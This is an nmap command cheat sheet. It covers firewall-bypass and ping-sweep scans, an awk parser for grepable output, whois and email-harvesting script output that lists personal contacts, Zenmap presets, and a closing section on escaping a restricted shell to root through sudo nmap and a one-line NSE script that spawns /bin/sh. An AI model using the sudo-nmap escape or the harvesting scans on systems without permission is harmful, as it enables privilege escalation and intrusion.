Scanning when a firewall blocks the traffic: the ping probes are dropped, so host discovery is skipped with -Pn and port 21 is scanned directly instead of nmap giving up on a host that never answers ping. Older Nmap releases spelled the option -PN; both spellings are still accepted.
$ sudo nmap -p 21 x.x.x.x -Pn
Scans the 192.168.1.0/24 subnet and lists the hosts that are up (ping sweep only, no port scan). The option is called -sn in current Nmap; -sP is the older name and is kept as an alias.
$ sudo nmap -sn 192.168.1.0/24
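The sweep above is normally the first step of a larger procedure, so its result has to be fed into the next command. As an added example, not from the original page, the POSIX shell functions below parse nmap's grepable output (-oG -) into a plain list of live hosts, and also pull open ports out of a port-scan line so the same parser serves the port scans further down. The sample output is constructed for the example; the host names and addresses are assumptions.

```shell
#!/bin/sh
# Added example, not part of the original page: parse nmap grepable
# output (-oG -) without depending on nmap being installed.

# sample: constructed -oG output mixing a ping sweep (Status lines) with
# one port-scanned host (Ports line). Fields are tab separated, as nmap emits them.
sample() {
    printf 'Host: 192.168.1.1 (router.lan)\tStatus: Up\n'
    printf 'Host: 192.168.1.10 ()\tStatus: Up\n'
    printf 'Host: 192.168.1.20 ()\tStatus: Down\n'
    printf 'Host: 192.168.1.30 (nas.lan)\tStatus: Up\n'
    printf 'Host: 192.168.1.30 (nas.lan)\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http///, 111/filtered/tcp//rpcbind///\tIgnored State: closed (997)\n'
}

# live_hosts: print the IP of every host nmap reported as up, once each.
# $2 is the address because awk splits on any whitespace, tabs included.
live_hosts() {
    awk '/^Host:/ && /Status: Up/ && !seen[$2]++ { print $2 }'
}

# open_ports: print "ip port/proto service" for every port in state "open".
# Each port token looks like port/state/proto/owner/service/rpc/version and
# ends with a comma except the last one.
open_ports() {
    awk '
        /^Host:/ {
            for (i = 3; i <= NF; i++)
                if ($i ~ /^[0-9]+\/[a-z|-]+\/(tcp|udp|sctp)\//) {
                    tok = $i; sub(/,$/, "", tok)
                    split(tok, f, "/")
                    if (f[2] == "open") print $2, f[1] "/" f[3], f[5]
                }
        }'
}

# Stand-alone demonstration on the constructed sample.
sample | live_hosts
sample | open_ports

# Real use (not run here): sudo nmap -sn 192.168.1.0/24 -oG - | live_hosts
```

Hosts that were scanned for ports get both a Status line and a Ports line in grepable output, which is why live_hosts deduplicates on the address. Feeding the result back in, for instance `sudo nmap -sV -oG - $(sudo nmap -sn 192.168.1.0/24 -oG - | live_hosts) | open_ports`, turns the two commands on this page into one pipeline.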
Domains
Scans the domain's ports (the default top 1000, since no -p is given) and prints whois information for the address block the host sits in; the whois host script queries the regional registry, here RIPE. In Nmap 6.40 the script is named whois; later releases renamed it whois-ip and added a separate whois-domain script.
$ nmap --script whois test.lt
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-26 15:04 EEST
Nmap scan report for test.lt (195.8.218.22)
Host is up (0.0084s latency).
rDNS record for 195.8.218.22: domains.domreg.lt
Not shown: 996 filtered ports
PORT STATE SERVICE
43/tcp open whois
53/tcp open domain
80/tcp open http
443/tcp open https
Host script results:
| whois: Record found at whois.ripe.net
| inetnum: 195.8.218.0 - 195.8.219.255
| netname: DOMREG_LT
| descr: Kauno Technologijos Universitetas
| country: LT
| orgname: Kauno Technologijos Universitetas
| organisation: ORG-KTU2-RIPE
| email: hostmaster@domreg.lt
| person: Tomas Mackus
|_email: tomas@domreg.lt
Looks for e-mail addresses related to the domain by spidering its website over port 80. The spidering limits shown in the output are the httpspider library defaults and can be raised with --script-args httpspider.maxdepth=N,httpspider.maxpagecount=N.
$ nmap -p80 --script http-email-harvest test.lt
Starting Nmap 6.40 ( http://nmap.org ) at 2014-06-26 15:02 EEST
Nmap scan report for test.lt (195.8.218.22)
Host is up (0.0047s latency).
rDNS record for 195.8.218.22: domains.domreg.lt
PORT STATE SERVICE
80/tcp open http
| http-email-harvest:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=test.lt
|_ hostmaster@domains.lt
Zenmap preset profiles, thanks Jerret
- Intense Scan (-T4 -A -v)
- Intense Scan plus UDP (-sS -sU -T4 -A -v)
- Intense Scan, all TCP Ports (-p 1-65535 -T4 -A -v)
- Intense Scan, no PING (-T4 -A -v -Pn)
- Ping Scan (-sn)
- Quick Scan (-T4 -F)
- Quick Scan Plus (-sV -T4 -O -F --version-light)
- Quick Traceroute (-sn --traceroute)
- Regular Scan (no options are used)
- Slow Comprehensive Scan (-sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)")
How to break out of a restricted shell with nmap?
NSE scripts are Lua, and any top-level code in a script runs as soon as nmap loads it, with nmap's privileges. If sudo allows nmap (check with sudo -l), a one-line script that spawns a shell therefore gives a root shell:
$ echo "os.execute('/bin/sh')" > x.nse
$ sudo nmap --script=x.nse
If keystrokes are not echoed in the spawned shell, stty echo restores them. Nmap 2.02 through 5.21 also had an interactive mode (nmap --interactive, then !sh) that served the same purpose; it was removed in later releases.